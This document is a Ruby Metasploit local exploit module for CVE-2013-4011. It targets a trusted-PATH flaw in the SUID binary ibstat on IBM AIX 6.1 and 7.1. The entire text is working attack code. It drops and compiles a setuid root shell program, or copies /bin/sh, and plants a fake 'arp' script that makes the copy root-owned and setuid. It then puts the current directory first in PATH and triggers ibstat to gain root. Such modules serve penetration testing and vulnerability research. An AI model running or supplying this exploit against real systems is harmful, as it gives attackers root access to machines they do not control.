# Not sure if the deps are correct require 'msf/core' require 'rex' class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking def initialize(info={}) super( update_info( info, { 'Name' => 'ibstat $PATH Privilege Escalation', 'Description' => %q{ This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'. }, 'Author' => [ 'Kristian Erik Hermansen', #original author 'Sagi Shahar (sagi-) ', #msf module 'Kostas Lintovois ', #msf module ], 'References' => [ [ 'CVE', '2013-4011' ], [ 'OSVDB', '95420' ], [ 'BID', '61287' ], [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ], [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ] ], 'Platform' => [ 'aix' ], 'Arch' => [ 'ppc' ], 'Targets' => [ [ 'IBM AIX Version 6.1', { 'Arch' => 'ppc', 'Platform' => 'aix', 'AIX' => '6.1', } ], [ 'IBM AIX Version 7.1', { 'Arch' => 'ppc', 'Platform' => 'aix', 'AIX' => '7.1', } ], ], 'DefaultTarget' => 1, } )) register_options([ OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]), ], self.class) end def exploit if not is_vuln() return end root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}" arp_file = "#{datastore["WritableDir"]}/arp" if (is_gcc_installed == true) write_c_file("#{root_file}") print_status("Compiling source...") cmd_exec "gcc -o #{root_file} #{root_file}" + ".c" print_status("Compilation completed") print_status("Deleting source...") cmd_exec "rm #{root_file}.c" else cmd_exec "cp /bin/sh " + "#{root_file}" end print_status("Writing custom arp file...") write_arp_file("#{arp_file}","#{root_file}") print_status("Custom arp file written") print_status("Updating PATH environment variable...") cmd_exec 'PATH=.:$PATH' cmd_exec 'export PATH' print_status("Triggering vulnerablity...") cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null' print_status("Removing custom arp...") cmd_exec "rm #{arp_file}" print_status("Checking root privileges...") verify_root("#{root_file}") end def is_gcc_installed print_status("Checking if gcc exists...") gcc_version = cmd_exec 'gcc -v' gcc_array = gcc_version.split("\n") gcc_array.each do |res| if res.include? ("gcc version") print_good("gcc found! " + "(" + "#{res}" + ")") return true end end print_status("gcc not found. Using /bin/sh from local system") return false; end def write_c_file(filename) c_file = filename + ".c" print_status("Dropping file " + c_file + "...") cmd_exec "echo \"#include \n\" > " + c_file cmd_exec "echo \"int main()\" >> " + c_file cmd_exec "echo \"{\" >> " + c_file cmd_exec "echo \"setreuid(0,0);\" >> " + c_file cmd_exec "echo \"setregid(0,0);\" >> " + c_file cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file cmd_exec "echo \"return 0;\" >> " + c_file cmd_exec "echo \"}\" >> " + c_file end def write_arp_file(arp_file, bin_file) cmd_exec "echo \"#!/bin/sh\" > " + arp_file cmd_exec "echo \"chown root " + bin_file + "\" >> " + arp_file cmd_exec "echo \"chmod 4555 " + bin_file + "\" >> " + arp_file cmd_exec "chmod 0555 " + arp_file end def verify_root(filename) cmd_exec filename id_output = cmd_exec "id" if id_output.include? ("euid=0(root)") print_good("Got root! (euid)") elsif id_output.include?("uid=0(root)") print_good("Got root!") else print_status("Exploit failed") end end def is_vuln() ls_output = cmd_exec "ls -l /usr/sbin/ibstat" if ls_output.include? ("-r-sr-xr-x") print_good("Target is vulnerable") return true else print_status("Target is not vulnerable") return false end end end